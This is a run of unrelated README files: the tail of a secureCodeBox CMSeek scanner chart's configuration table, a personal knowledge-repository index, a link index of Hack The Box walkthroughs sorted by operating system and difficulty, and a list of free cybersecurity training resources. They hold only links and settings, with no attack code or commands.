| scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) |
| scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) |
| scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| scanner.image.repository | string | `"docker.io/securecodebox/scanner-cmseek"` | Container Image to run the scan |
| scanner.image.tag | string | `nil` | defaults to the charts appVersion |
| scanner.nameAppend | string | `nil` | append a string to the default scantype name. |
| scanner.podSecurityContext | object | `{}` | Optional securityContext set on scanner pod (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) |
| scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":true}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated |
| scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. |
| scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode |
| scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system |
| scanner.securityContext.runAsNonRoot | bool | `true` | Enforces that the scanner image is run as a non root user |
| scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
## License
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license].
[scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox
[scb-docs]: https://www.securecodebox.io/
[scb-site]: https://www.securecodebox.io/
[scb-github]: https://github.com/secureCodeBox/
[scb-twitter]: https://twitter.com/secureCodeBox
[scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU
[scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
|
## Knowledge Repository
The Knowledge Repository is a [memex](https://en.wikipedia.org/wiki/Memex), a personal knowledge database, a collection of notes, references, book summaries and examples.
### The Problem
The more I learn the more I forget.
To avoid forgetting, I have to revise.
The more knowledge I have the more time I have to spend revising instead acquiring new knowledge.
At some point I will spend all my time revising.
### The Solution
To combat this, I've created a way to store knowledge outside my body: the Knowledge Repository.
In it I can store what I know and how I was able to acquiring this knowledge in the first place.
### Contents
* Convention
* Script
* [AlignText](Convention/Script/AlignText)
* [GenerateDirectoryLinks](Convention/Script/GenerateDirectoryLinks)
* Economy
* RayDalio
* [EconomicMachine](Economy/RayDalio/EconomicMachine)
* Management
* Agile
* [AgileManifesto](Management/Agile/AgileManifesto)
* [Kanban](Management/Agile/Kanban)
* Scrum
* [AtlassianScrum](Management/Agile/Scrum/AtlassianScrum)
* [Interviewing](https://github.com/MislavJaksic/Client-Interviews)
* [LeadershipTheoryAndPractice](Management/LeadershipTheoryAndPractice)
* Productivity
* ChrisSparks
* [ExperimentWithoutLimits](Productivity/ChrisSparks/ExperimentWithoutLimits)
* [ProductivityAndGoalSetting](Productivity/ChrisSparks/ProductivityAndGoalSetting)
* ErikDietrich
* [HowToPickNiche](Productivity/ErikDietrich/HowToPickNiche)
* [Marketing101](Productivity/ErikDietrich/Marketing101)
* [Freelancing](Productivity/Freelancing)
* [IDEvsEditor](Productivity/IDEvsEditor)
* RayDalio
* [PrinciplesForSuccess](Productivity/RayDalio/PrinciplesForSuccess)
* TomCritchlow
* [TheStrategicIndependant](Productivity/TomCritchlow/TheStrategicIndependant)
* Technology
* Analytics
* [ApacheDruid](Technology/Analytics/ApacheDruid)
* [Elastic](Technology/Analytics/Elastic)
* [GoogleSheets](Technology/Analytics/GoogleSheets)
* Communication
* Discord
* [ChatExporter](Technology/Communication/Discord/ChatExporter)
* DevOps
* [Ansible](Technology/DevOps/Ansible)
* CICD
* [Argo](Technology/DevOps/CICD/Argo)
* [ArgoCD](Technology/DevOps/CICD/Argo/ArgoCD)
* [Brigade](Technology/DevOps/CICD/Brigade)
* [Concourse](Technology/DevOps/CICD/Concourse)
* [Jenkins](Technology/DevOps/CICD/Jenkins)
* [Tekton](Technology/DevOps/CICD/Tekton)
* CodeExploration
* [Sourcetrail](Technology/DevOps/CodeExploration/Sourcetrail)
* Container
* [Ambassador](Technology/DevOps/Container/Ambassador)
* [ArtifactHub](Technology/DevOps/Container/ArtifactHub)
* [Docker](Technology/DevOps/Container/Docker)
* [Harbor](Technology/DevOps/Container/Harbor)
* [Helm](Technology/DevOps/Container/Helm)
* [Kubernetes](Technology/DevOps/Container/Kubernetes)
* [Linkerd](Technology/DevOps/Container/Linkerd)
* [OKD](Technology/DevOps/Container/OKD)
* [OperatorFramework](Technology/DevOps/Container/OperatorFramework)
* [Portainer](Technology/DevOps/Container/Portainer)
* Dataflow
* [NiFi](Technology/DevOps/Dataflow/NiFi)
* Observability
* ChaosEngineering
* [blockade](Technology/DevOps/Observability/ChaosEngineering/blockade)
* Logging
* [HowToAppLoggingWhitepaper](Technology/DevOps/Observability/Logging/HowToAppLoggingWhitepaper)
* [OWASPCheatSheet](Technology/DevOps/Observability/Logging/OWASPCheatSheet)
* Monitoring
* [Grafana](Technology/DevOps/Observability/Monitoring/Grafana)
* [Prometheus](Technology/DevOps/Observability/Monitoring/Prometheus)
* Tracing
* [Jaeger](Technology/DevOps/Observability/Tracing/Jaeger)
* Security
* [CloudFlare](Technology/DevOps/Security/CloudFlare)
* [Keycloak](Technology/DevOps/Security/Keycloak)
* [MobaXterm](Technology/DevOps/Security/MobaXterm)
* [OpenPolicyAgent](Technology/DevOps/Security/OpenPolicyAgent)
* [OpenVPN](Technology/DevOps/Security/OpenVPN)
* [pscp](Technology/DevOps/Security/pscp)
* [Putty](Technology/DevOps/Security/Putty)
* [SSH](Technology/DevOps/Security/SSH)
* [WinSCP](Technology/DevOps/Security/WinSCP)
* Server
* [Gunicorn](Technology/DevOps/Server/Gunicorn)
* Hosting
* [DigitalOcean](Technology/DevOps/Server/Hosting/DigitalOcean)
* [GoogleCloudPlatform](Technology/DevOps/Server/Hosting/GoogleCloudPlatform)
* [Netlify](Technology/DevOps/Server/Hosting/Netlify)
* [OracleCloud](Technology/DevOps/Server/Hosting/OracleCloud)
* [Nginx](Technology/DevOps/Server/Nginx)
* VersionControl
* [Git](Technology/DevOps/VersionControl/Git)
* [GitHub](Technology/DevOps/VersionControl/GitHub)
* [GitLab](Technology/DevOps/VersionControl/GitLab)
* [Guitar](Technology/DevOps/VersionControl/Guitar)
* VirtualMachine
* [OpenStack](Technology/DevOps/VirtualMachine/OpenStack)
* [VirtualBox](Technology/DevOps/VirtualMachine/VirtualBox)
* Editor
* [Atom](Technology/Editor/Atom)
* [SublimeText](Technology/Editor/SublimeText)
* ERP
* [SAP](https://github.com/MislavJaksic/SAP-ABAP-Development)
* GameEngine
* [VassalEngine](Technology/GameEngine/VassalEngine)
* IDE
* [CodeBlocks](Technology/IDE/CodeBlocks)
* [Eclipse](Technology/IDE/Eclipse)
* [IntelliJIDEA](Technology/IDE/IntelliJIDEA)
* [PyCharm](Technology/IDE/PyCharm)
* OS
* [Linux](Technology/OS/Linux)
* [Cygwin](Technology/OS/Linux/Cygwin)
* [MSYS2](Technology/OS/Linux/MSYS2)
* [ShellScripting](Technology/OS/Linux/ShellScripting)
* [Tmux](Technology/OS/Linux/Tmux)
* [Ubuntu](Technology/OS/Linux/Ubuntu)
* Windows
* [WSL](Technology/OS/Windows/WSL)
* Parser
* [jq](Technology/Parser/jq)
* [TableConverter](Technology/Parser/TableConverter)
* [yq](Technology/Parser/yq)
* Software
* BuildTool
* [Bazel](Technology/Software/BuildTool/Bazel)
* [Gradle](https://github.com/MislavJaksic/Gradle-Tutorial)
* [Maven](https://github.com/MislavJaksic/Maven-Tutorial)
* [poetry](Technology/Software/BuildTool/poetry)
* CodeQuality
* [CleanCode](Technology/Software/CodeQuality/CleanCode)
* [CodeComplete](Technology/Software/CodeQuality/CodeComplete)
* DataScience
* [ComputerVision](Technology/Software/DataScience/ComputerVision)
* DesignPattern
* [DesignPatterns](https://github.com/MislavJaksic/Design-Patterns)
* [MicroserviceGuide](Technology/Software/DesignPattern/MicroserviceGuide)
* Linter
* PackageManager
* [Chocolatey](Technology/Software/PackageManager/Chocolatey)
* [Scoop](Technology/Software/PackageManager/Scoop)
* ProgrammingLanguage
* [ABAP](https://github.com/MislavJaksic/SAP-ABAP-Development/tree/master/ABAP)
* [C++](Technology/Software/ProgrammingLanguage/C++)
* [Elm](Technology/Software/ProgrammingLanguage/Elm)
* [Go](Technology/Software/ProgrammingLanguage/Go)
* [Haskell](Technology/Software/ProgrammingLanguage/Haskell)
* [Java](Technology/Software/ProgrammingLanguage/Java)
* [Spring](https://github.com/MislavJaksic/Spring-Guides-Tutorials)
* [Wiki](Technology/Software/ProgrammingLanguage/Java/Testing/Mockito/Wiki)
* [JavaScript](Technology/Software/ProgrammingLanguage/JavaScript)
* [Lisp](Technology/Software/ProgrammingLanguage/Lisp)
* [Python3.x](Technology/Software/ProgrammingLanguage/Python3.x)
* [R](Technology/Software/ProgrammingLanguage/R)
* [Ruby](Technology/Software/ProgrammingLanguage/Ruby)
* [Wiki](Technology/Software/Wiki)
* Storage
* Cache
* [memcached](Technology/Storage/Cache/memcached)
* [Redis](Technology/Storage/Cache/Redis)
* [DataWarehouse](Technology/Storage/DataWarehouse)
* Embedded
* [SQLite](Technology/Storage/Embedded/SQLite)
* Inspector
* [DBeaver](Technology/Storage/Inspector/DBeaver)
* [SQLiteBrowser](Technology/Storage/Inspector/SQLiteBrowser)
* Large
* [ApacheHadoop](Technology/Storage/Large/ApacheHadoop)
* [ApacheHive](Technology/Storage/Large/ApacheHive)
* [Graphite](Technology/Storage/Large/Graphite)
* [MongoDB](Technology/Storage/Large/MongoDB)
* mySQL
* [phpMyAdmin](Technology/Storage/Large/mySQL/phpMyAdmin)
* [PostgreSQL](Technology/Storage/Large/PostgreSQL)
* [Vitess](Technology/Storage/Large/Vitess)
* [SQL](https://github.com/MislavJaksic/SQL-Tutorial)
* Streaming
* [ApacheFlink](Technology/Streaming/ApacheFlink)
* [ApacheKafka](https://github.com/MislavJaksic/Kafka-In-Theory-And-Practice)
* [ApacheSpark](Technology/Streaming/ApacheSpark)
* Utility
* [CollageLabs](https://github.com/MislavJaksic/College-Labs)
* [HomeNetworking](Technology/Utility/HomeNetworking)
* [Latex](https://github.com/MislavJaksic/Latex-Overleaf)
* [Notion](Technology/Utility/Notion)
* [Practise](https://github.com/MislavJaksic/Practise)
* Regex
* [LibreOffice](Technology/Utility/Regex/LibreOffice)
* [regexer](Technology/Utility/Regex/regexer)
* [UtilityScript](Technology/Utility/UtilityScript)
* [WindowsPowerTools](Technology/Utility/WindowsPowerTools)
* Video
* [Asciinema](Technology/Video/Asciinema)
* [Bandicut](Technology/Video/Bandicut)
* [OBS](Technology/Video/OBS)
* [OpenShot](Technology/Video/OpenShot)
* Web
* API
* [GraphQL](https://github.com/MislavJaksic/GraphQL-Tutorial)
* [Postman](Technology/Web/API/Postman)
* REST
* [RESTFulWebServices](Technology/Web/API/REST/RESTFulWebServices)
* Swagger
* [SwaggerCodegen](Technology/Web/API/Swagger/SwaggerCodegen)
* [SwaggerEditor](Technology/Web/API/Swagger/SwaggerEditor)
* Bookmark
* [Shiori](Technology/Web/Bookmark/Shiori)
* Browser
* [FirefoxDeveloper](Technology/Web/Browser/FirefoxDeveloper)
* CMS
* [Ghost](Technology/Web/CMS/Ghost)
* [CSS](https://github.com/MislavJaksic/MDN-Tutorial)
* DNS
* [DNSChecker](Technology/Web/DNS/DNSChecker)
* [DomeneHR](Technology/Web/DNS/DomeneHR)
* [Electron](Technology/Web/Electron)
* File
* [FileZilla](Technology/Web/File/FileZilla)
* Framework
* [Flask](https://github.com/MislavJaksic/Flask-Tutorial)
* [RubyOnRails](Technology/Web/Framework/RubyOnRails)
* [Google](Technology/Web/Google)
* [HackTheBox](Technology/Web/HackTheBox)
* [HTML](https://github.com/MislavJaksic/MDN-Tutorial)
* [NodeJS](Technology/Web/NodeJS)
* Scraping
* [Scrapy](https://github.com/MislavJaksic/Scrapy-Project)
* [Selenium](https://github.com/MislavJaksic/Selenium-Tutorial)
* StaticSiteGenerator
* [GatsbyJS](Technology/Web/StaticSiteGenerator/GatsbyJS)
* [Jekyll](https://github.com/MislavJaksic/Jekyll-Tutorial)
* TemplateProcessor
* [Handlebars](Technology/Web/TemplateProcessor/Handlebars)
* Thinking
* [AnimalFarm](Thinking/AnimalFarm)
* [BraveNewWorld](Thinking/BraveNewWorld)
* [CallOfCathulu](Thinking/CallOfCathulu)
* [DungeonWorld](Thinking/DungeonWorld)
* [OrigamiDesignSecrets](Thinking/OrigamiDesignSecrets)
* [Stonetop](Thinking/Stonetop)
* [TheLiesOfLockeLamora](Thinking/TheLiesOfLockeLamora)
* [ThinkingFastAndSlow](Thinking/ThinkingFastAndSlow)
* Translating
* [PaineOpposesExecutionOfLouis](Thinking/Translating/PaineOpposesExecutionOfLouis)
* Witcher
* [TheLastWish](Thinking/Witcher/TheLastWish)
* Writing
* [JBPeterson](Thinking/Writing/JBPeterson)
* [SenseOfStyle](Thinking/Writing/SenseOfStyle)
### Contact
If you are thinking about writing an email, do it. Correspondence is a joy to read.
```
Email: [email protected]
Write an email as if you were writing a letter.
```
|
# HackTheBox CTF Cheatsheet
This cheatsheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty. This list contains all the Hack The Box writeups available on hackingarticles. We have performed and compiled this list on our experience. Please share this with your connections and direct queries and feedback to [Pavandeep Singh](https://twitter.com/pavan2318).
[1.1]: http://i.imgur.com/tXSoThF.png
[1]: http://www.twitter.com/hackinarticles
# Follow us on [![alt text][1.1]][1]
| No. | Machine Name | Operating System | Difficulty |
|-----|--------------|------------------|------------------|
| 1. | [Access](https://www.hackingarticles.in/hack-the-box-access-walkthrough/)|Windows|Easy|
| 2. | [Active](https://www.hackingarticles.in/hack-the-box-active-walkthrough/)|Windows|Easy|
| 3. | [Apocalyst](https://www.hackingarticles.in/hack-the-box-challenge-apocalyst-walkthrough/)|Linux|Medium|
| 4. | [Aragog](https://www.hackingarticles.in/hack-the-box-aragog-walkthrough/)|Linux|Medium|
| 5. | [Arctic](https://www.hackingarticles.in/hack-the-box-challenge-arctic-walkthrough/)|Windows|Easy|
| 6. | [Ariekei](https://www.hackingarticles.in/hack-the-box-challenge-ariekei-walkthrough/)|Linux|Insane|
| 7. | [Bank](https://www.hackingarticles.in/hack-the-box-challenge-bank-walkthrough/)|Linux|Easy|
| 8. | [Bart](https://www.hackingarticles.in/hack-the-box-bart-walkthrough/)|Windows|Medium|
| 9. | [Bashed](https://www.hackingarticles.in/hack-the-box-challenge-bashed-walkthrough/)|Linux|Easy|
| 10. | [Beep](https://www.hackingarticles.in/hack-the-box-challenge-beep-walkthrough/)|Linux|Easy|
| 11. | [Blocky](https://www.hackingarticles.in/hack-the-box-challenge-blocky-walkthrough/)|Linux|Easy|
| 12. | [Blue](https://www.hackingarticles.in/hack-the-box-challenge-blue-walkthrough/)|Windows|Easy|
| 13. | [Bounty](https://www.hackingarticles.in/hack-the-box-bounty-walkthrough/)|Windows|Easy|
| 14. | [Brainfuck](https://www.hackingarticles.in/hack-the-box-challenge-brainfuck-walkthrough/)|Linux|Insane|
| 15. | [Calamity](https://www.hackingarticles.in/hack-the-box-challenge-calamity-walkthrough/)|Linux|Hard|
| 16. | [Canape](https://www.hackingarticles.in/hack-the-box-challenge-canape-walkthrough/)|Linux|Medium|
| 17. | [Carrier](https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/)|Linux|Medium|
| 18. | [Celestial](https://www.hackingarticles.in/hack-the-box-celestial-walkthrough/)|Linux|Medium|
| 19. | [Charon](https://www.hackingarticles.in/hack-the-box-challenge-charon-walkthrough/)|Linux|Hard|
| 20. | [Chatterbox](https://www.hackingarticles.in/hack-the-box-challenge-chatterbox-walkthrough/)|Windows|Medium|
| 21. | [Crimestoppers](https://www.hackingarticles.in/hack-the-box-challenge-crimestoppers-walkthrough/)|Windows|Hard|
| 22. | [Cronos](https://www.hackingarticles.in/hack-the-box-challenge-cronos-walkthrough/)|Linux|Hard|
| 23. | [Curling](https://www.hackingarticles.in/hack-the-box-curling-walkthrough/)|Linux|Easy|
| 24. | [Dab](https://www.hackingarticles.in/hack-the-box-dab-walkthrough/)|Linux|Hard|
| 25. | [Devel](https://www.hackingarticles.in/hack-the-box-challenge-devel-walkthrough/)|Windows|Easy|
| 26. | [DevOops](https://www.hackingarticles.in/hack-the-box-devoops-walkthrough/)|Linux|Medium|
| 27. | [Dropzone](https://www.hackingarticles.in/hack-the-box-dropzone-walkthrough/)|Windows|Hard|
| 28. | [Enterprise](https://www.hackingarticles.in/hack-the-box-challenge-enterprises-walkthrough/)|Linux|Medium|
| 29. | [Europa](https://www.hackingarticles.in/hack-the-box-challenge-europa-walkthrough/)|Linux|Medium|
| 30. | [Falafel](https://www.hackingarticles.in/hack-the-box-challenge-falafel-walkthrough/)|Linux|Hard|
| 31. | [Fighter](https://www.hackingarticles.in/hack-the-box-fighter-walkthrough/)|Windows|Insane|
| 32. | [Fluxcapacitor](https://www.hackingarticles.in/hack-the-box-challenge-fluxcapacitor-walkthrough/)|Linux|Medium|
| 33. | [FriendZone](https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/)|Linux|Easy|
| 34. | [Frolic](https://www.hackingarticles.in/hack-the-box-frolic-walkthrough/)|Linux|Easy|
| 35. | [Fulcurm](https://www.hackingarticles.in/hack-the-box-fulcrum-walkthrough/)|Linux|Easy|
| 36. | [Giddy](https://www.hackingarticles.in/hack-the-box-giddy-walkthrough/)|Windows|Medium|
| 37. | [Grandpa](https://www.hackingarticles.in/hack-the-box-challenge-grandpa-walkthrough/)|Windows|Easy|
| 38. | [Granny](https://www.hackingarticles.in/hack-the-box-challenge-granny-walkthrough/)|Windows|Easy|
| 39. | [Haircut](https://www.hackingarticles.in/hack-the-box-challenge-haircut-walkthrough/)|Linux|Medium|
| 40. | [Hawk](https://www.hackingarticles.in/hack-the-box-hawk-walkthrough/)|Linux|Medium|
| 41. | [Help](https://www.hackingarticles.in/hack-the-box-help-walkthrough/)|Linux|Easy|
| 42. | [Holiday](https://www.hackingarticles.in/hack-the-box-holiday-walkthrough/)|Linux|Hard|
| 43. | [Inception](https://www.hackingarticles.in/hack-the-box-challenge-inception-walkthrough/)|Linux|Medium|
| 44. | [Irked](https://www.hackingarticles.in/hack-the-box-irked-walkthrough/)|Linux|Easy|
| 45. | [Jail](https://www.hackingarticles.in/hack-the-box-challenge-jail-walkthrough/)|Linux|Insane|
| 46. | [Jeeves](https://www.hackingarticles.in/hack-the-box-challenge-jeeves-walkthrough/)|Windows|Medium|
| 47. | [Jerry](https://www.hackingarticles.in/hack-the-box-jerry-walkthrough/)|Windows|Easy|
| 48. | [Joker](https://www.hackingarticles.in/hack-the-box-challenge-joker-walkthrough/)|Linux|Hard|
| 49. | [Kotarak](https://www.hackingarticles.in/hack-the-box-challenge-kotarak-walkthrough/)|Linux|Hard|
| 50. | [Lame](https://www.hackingarticles.in/hack-the-box-challenge-lame-walkthrough/)|Linux|Easy|
| 51. | [Lazy](https://www.hackingarticles.in/hack-the-box-challenge-lazy-walkthrough/)|Linux|Medium|
| 52. | [Legacy](https://www.hackingarticles.in/hack-the-box-challenge-legacy-walkthrough/)|Windows|Easy|
| 53. | [Lightweight](https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/)|Linux|Medium|
| 54. | [Mantis](https://www.hackingarticles.in/hack-the-box-challenge-mantis-walkthrough/)|Windows|Hard|
| 55. | [Minion](https://www.hackingarticles.in/hack-the-box-minion-walkthrough/)|Windows|Insane|
| 56. | [Mirai](https://www.hackingarticles.in/hack-the-box-challenge-mirai-walkthrough/)|Linux|Easy|
| 57. | [Mischief](https://www.hackingarticles.in/hack-the-box-mischief-walkthrough/)|Linux|Insane|
| 58. | [Netmon](https://www.hackingarticles.in/hack-the-box-netmon-walkthrough/)|Windows|Easy|
| 59. | [Nibble](https://www.hackingarticles.in/hack-the-box-challenge-nibble-walkthrough/)|Linux|Easy|
| 60. | [Nightmare](https://www.hackingarticles.in/hack-nightmare-vm-ctf-challenge/)|Linux|Insane|
| 61. | [Nineveh](https://www.hackingarticles.in/hack-the-box-nineveh-walkthrough/)|Linux|Medium|
| 62. | [Node](https://www.hackingarticles.in/hack-the-box-challenge-node-walkthrough/)|Linux|Medium|
| 63. | [October](https://www.hackingarticles.in/hack-the-box-october-walkthrough/)|Linux|Medium|
| 64. | [Olympus](https://www.hackingarticles.in/hack-the-box-olympus-walkthrough/)|Linux|Medium|
| 65. | [Optimum](https://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/)|Windows|Easy|
| 66. | [Poison](https://www.hackingarticles.in/hack-the-box-poison-walkthrough/)|FreeBSD|Medium|
| 67. | [Popcorn](https://www.hackingarticles.in/hack-the-box-challenge-popcorn-walkthrough/)|Linux|Medium|
| 68. | [SecNotes](https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/)|Windows|Medium|
| 69. | [Sense](https://www.hackingarticles.in/hack-the-box-challenge-sense-walkthrough/)|FreeBSD|Easy|
| 70. | [Shocker](https://www.hackingarticles.in/hack-the-box-challenge-shocker-walkthrough/)|Linux|Easy|
| 71. | [Shrek](https://www.hackingarticles.in/hack-the-box-challenge-shrek-walkthrough/)|Linux|Hard|
| 72. | [Silo](https://www.hackingarticles.in/hack-the-box-silo-walkthrough/)|Windows|Medium|
| 73. | [Sneaky](https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/)|Linux|Medium|
| 74. | [Solid State](https://www.hackingarticles.in/hack-the-box-challenge-solid-state-walkthrough/)|Linux|Medium|
| 75. | [Stratosphere](https://www.hackingarticles.in/hack-the-box-stratospherewalkthrough/)|Linux|Medium|
| 76. | [Sunday](https://www.hackingarticles.in/hack-the-box-sunday-walkthrough/)|Solaris|Easy|
| 77. | [Tally](https://www.hackingarticles.in/hack-the-box-challenge-tally-walkthrough/)|Windows|Hard|
| 78. | [TartarSauce](https://www.hackingarticles.in/hack-the-box-tartarsauce-walkthrough/)|Linux|Medium|
| 79. | [Teacher](https://www.hackingarticles.in/hack-the-box-teacher-walkthrough/)|Linux|Easy|
| 80. | [Tenten](https://www.hackingarticles.in/hack-the-box-challenge-tenten-walkthrough/)|Linux|Medium|
| 81. | [Valentine](https://www.hackingarticles.in/hack-the-box-valentine-walkthrough/)|Linux|Easy|
| 82. | [Vault](https://www.hackingarticles.in/hack-the-box-vault-walkthrough/)|Linux|Medium|
| 83. | [Waldo](https://www.hackingarticles.in/hack-the-box-waldo-walkthrough/)|Linux|Medium|
| 84. | [Ypuffy](https://www.hackingarticles.in/hack-the-box-ypuffy-walkthrough/)|Others|Medium|
| 85. | [Zipper](https://www.hackingarticles.in/hack-the-box-zipper-walkthrough/)|Linux|Hard|
| 86. | [Luke](https://www.hackingarticles.in/hack-the-box-luke-walkthrough/)|Linux|Easy|
| 87. | [Bastion](https://www.hackingarticles.in/hack-the-box-challenge-bastion-walkthrough/)|Windows|Easy|
| 88. | [Heist](https://www.hackingarticles.in/hack-the-box-heist-walkthrough/) | Windows | Medium |
| 89. | [Bitlab](https://www.hackingarticles.in/hack-the-box-challenge-bitlab-walkthrough/) | Linux | Medium |
| 90. | [Jarvis](https://www.hackingarticles.in/hack-the-box-jarvis-walkthrough/) | Linux | Medium |
| 91. | [Writeup](https://www.hackingarticles.in/hack-the-box-writeup-walkthrough/) | Linux | Easy |
| 92. | [Networked](https://www.hackingarticles.in/hack-the-box-networked-walkthrough/) | Linux | Medium |
| 93. | [Haystack](https://www.hackingarticles.in/hack-the-box-haystack-walkthrough/) | Linux | Medium |
| 94. | [Postman](https://www.hackingarticles.in/hack-the-box-postman-walkthrough/) | Linux | Easy |
| 95. | [Wall](https://www.hackingarticles.in/hack-the-box-wall-walkthrough/)| Linux | Medium |
| 96. | [Open Admin Box](https://www.hackingarticles.in/hack-the-box-open-admin-box-walkthrough/)| Linux | Easy |
| 97. | [Monteverde](https://www.hackingarticles.in/hack-the-box-monteverde-walkthrough/)| Windows | Medium |
| 98. | [Sauna](https://www.hackingarticles.in/hackthebox-sauna-walkthrough/)| Windows | Easy |
| 99. | [Conceal](https://www.hackingarticles.in/conceal-hackthebox-walkthrough/)| Windows | Hard |
| 100. | [Tabby](https://www.hackingarticles.in/tabby-hackthebox-walkthrough/)| Linux | Easy |
|
<p align="center"> <img src="GerryMeMoji2.png"> </p>
An awesome list of resources for training, conferences, speaking, labs, reading, etc that are **free** all the time that cybersecurity professionals with downtime can take advantage of to improve their skills and marketability to come out on the other side ready to rock.
Drop me a subscribe on YouTube and lets connect more: https://www.youtube.com/c/GeraldAuger
# This repo is now maintained at SimplyCyber.io
# CATEGORIES
1. [Conferences](#conferences)
2. [Instructor Led Webinar/Labs/Workshops](#Instructor-Led-WebinarLabsWorkshops)
3. [Training](#Training)
4. [Books](#Books)
5. [College Courses (Multi-week w/Enrollment)](#College-Courses)
6. [Podcasts](#Podcasts)
7. [YouTube Channels](#Cybersecurity-YouTube-Channels)
8. [News](#News)
9. [Professional Networking / (Virtual) Meetups (Discord/Slack Groups)](#Professional-Networking)
10. [References / Tools / Cheat Sheets](#ReferencesToolsCheat-Sheets)
## Conferences
DUE TO OTHER COMMITMENTS I'VE BEEN UNABLE TO MAINTAIN CONFERENCE LISTING. DFIRDIVA MAINTAINS A GREAT SITE THAT INCLUDES CONFERENCE LISTING. PLEASE REFER THERE FOR THIS TYPE OF INFORMATION. https://dfirdiva.com/free-and-affordable-training
### Archived/Replay
* **SUMMERCON 2020** -Archived- Summercon is one of the oldest hacker conventions, and the longest running such conference in America. It helped set a precedent for more modern "cons" such as H.O.P.E. and DEF CON, although it has remained smaller and more personal. https://youtu.be/uVbrxMTrp0k
## Instructor Led Webinar/Labs/Workshops
DUE TO OTHER COMMITMENTS I'VE BEEN UNABLE TO MAINTAIN INSTRUCTOR LED WEBINAR LISTING. DFIRDIVA MAINTAINS A GREAT SITE THAT INCLUDES FREE TRAINING LISTINGS. PLEASE REFER THERE FOR THIS TYPE OF INFORMATION. https://dfirdiva.com/free-and-affordable-training
## Training
* **Nox Cyber** Jay Jay Davey site full of curated cybersecurity training resources. https://noxcyber.co.uk/
* **WebSecurity Academy** Free online web security training from the creators of Burp Suite https://portswigger.net/web-security
* **Mosse Cyber Security Institute** Introduction to cybersecurity free certification with 100+ hours of training, no expiry/renewals, https://www.mosse-institute.com/certifications/mics-introduction-to-cyber-security.html
* **BugCrowd University** Free bug hunting resources and methodologies in form of webinars, education and training. https://www.bugcrowd.com/hackers/bugcrowd-university/
* **Certified Network Security Specialist** Certification and training; Expires Aug 31 2020 Use coupon code #StaySafeHome during checkout to claim your free access. Offer is valid till 31/08/2020. £500.00 Value https://www.icsi.co.uk/courses/icsi-cnss-certified-network-security-specialist-covid-19
* **Metasploit Unleashed** Most complete and in-depth Metasploit guide available, with contributions from the authors of the No Starch Press Metasploit Book. https://www.offensive-security.com/metasploit-unleashed/
* **AWS Cloud Certified** Get skills in AWS to be more marketable. Training is quality and free. https://www.youtube.com/watch?v=3hLmDS179YE Have to create an AWS account, Exam is $100.
* **SANS Faculty Free Tools List of OSS** developed by SANS staff. https://www.sans.org/media/free/free-faculty-tools.pdf?msc=sans-free-lp
* **"Using ATT&CK for Cyber Threat Intelligence Training"** - 4 hour training The goal of this training is for students to understand the following: at: https://attack.mitre.org/resources/training/cti/
* **Coursera** -"Coursera Together: Free online learning during COVID-19" Lots of different types of free training. https://blog.coursera.org/coursera-together-free-online-learning-during-covid-19/
* **Fortinet Security Appliance Training** Free access to the FortiGate Essentials Training Course and Network Security Expert courses 1 and 2 https://www.fortinet.com/training/cybersecurity-professionals.html
